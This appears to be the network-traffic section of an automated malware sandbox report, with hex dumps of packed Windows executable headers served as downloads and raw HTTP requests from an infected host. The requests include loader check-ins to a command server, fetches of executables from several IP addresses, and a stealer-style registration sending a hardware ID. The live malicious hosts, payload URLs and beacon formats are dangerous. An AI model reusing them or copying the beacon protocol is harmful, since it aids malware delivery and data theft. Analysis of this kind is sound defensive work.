00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:26 GMTContent-Type: application/octet-streamContent-Length: 1840128Last-Modified: Sat, 30 Nov 2024 03:04:55 GMTConnection: keep-aliveETag: "674a80d7-1c1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce b4 e2 38 8a d5 8c 6b 8a d5 8c 6b 8a d5 8c 6b e5 a3 27 6b 92 d5 8c 6b e5 a3 12 6b 87 d5 8c 6b e5 a3 26 6b b0 d5 8c 6b 83 ad 0f 6b 89 d5 8c 6b 83 ad 1f 6b 88 d5 8c 6b 0a ac 8d 6a 89 d5 8c 6b 8a d5 8d 6b d6 d5 8c 6b e5 a3 23 6b 98 d5 8c 6b e5 a3 11 6b 8b d5 8c 6b 52 69 63 68 8a d5 8c 6b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e8 97 48 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 98 02 00 00 22 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 83 e5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 71 77 6e 6b 75 61 79 00 80 1a 00 00 10 50 00 00 74 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6c 72 73 63 6d 6b 70 00 10 00 00 00 90 6a 00 00 06 00 00 00 ec 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 f2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:34 GMTContent-Type: application/octet-streamContent-Length: 922112Last-Modified: Sat, 30 Nov 2024 03:03:02 GMTConnection: keep-aliveETag: "674a8066-e1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5e 80 4a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 62 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 75 5f 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 18 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 a6 00 00 00 40 0d 00 00 a8 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:42 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:28 GMTConnection: keep-aliveETag: "674a8080-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 2a 00 00 06 00 00 00 0c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 4467200Last-Modified: Sat, 30 Nov 2024 01:19:55 GMTConnection: keep-aliveETag: "674a683b-442a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 65 49 49 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 4f 00 00 d8 78 00 00 32 00 00 00 c0 ca 00 00 10 00 00 00 60 4f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 ca 00 00 04 00 00 0a 72 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 30 76 00 73 00 00 00 00 20 76 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 9d ca 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 9d ca 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 76 00 00 10 00 00 00 3c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 76 00 00 02 00 00 00 4c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 76 00 00 02 00 00 00 4e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 38 00 00 40 76 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 79 69 6a 74 61 62 62 00 c0 1b 00 00 f0 ae 00 00 b2 1b 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6b 62 76 70 6f 6f 7a 00 10 00 00 00 b0 ca 00 00 04 00 00 00 04 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 ca 00 00 22 00 00 00 08 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:30 GMTConnection: keep-aliveETag: "674a8082-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 2a 00 00 06 00 00 00 0c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:07:05 GMTContent-Type: application/octet-streamContent-Length: 2038784Last-Modified: Sat, 30 Nov 2024 01:37:00 GMTConnection: keep-aliveETag: "674a6c3c-1f1c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 d9 52 43 b2 b8 3c 10 b2 b8 3c 10 b2 b8 3c 10 ac ea b8 10 ac b8 3c 10 ac ea a9 10 ad b8 3c 10 ac ea bf 10 cd b8 3c 10 95 7e 47 10 b1 b8 3c 10 b2 b8 3d 10 33 b8 3c 10 ac ea b6 10 b3 b8 3c 10 ac ea a8 10 b3 b8 3c 10 ac ea ad 10 b3 b8 3c 10 52 69 63 68 b2 b8 3c 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 18 5b c6 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7c 05 00 00 ec 00 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 a1 26 1f 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 60 06 00 34 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c ff 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 ae 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 34 82 00 00 00 60 06 00 00 3c 00 00 00 be 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 00 07 00 00 02 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6c 67 66 72 74 61 73 00 00 1b 00 00 40 31 00 00 f6 1a 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 70 71 64 69 7a 68 00 10 00 00 00 40 4c 00 00 06 00 00 00 f4 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 fa 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010480001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010481001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010482001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 31 37 35 42 36 37 42 38 31 31 30 37 33 34 30 34 30 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="hwid"C47175B67B81107340409------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="build"drum------DGCGDBGCAAEBFIECGHDG--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
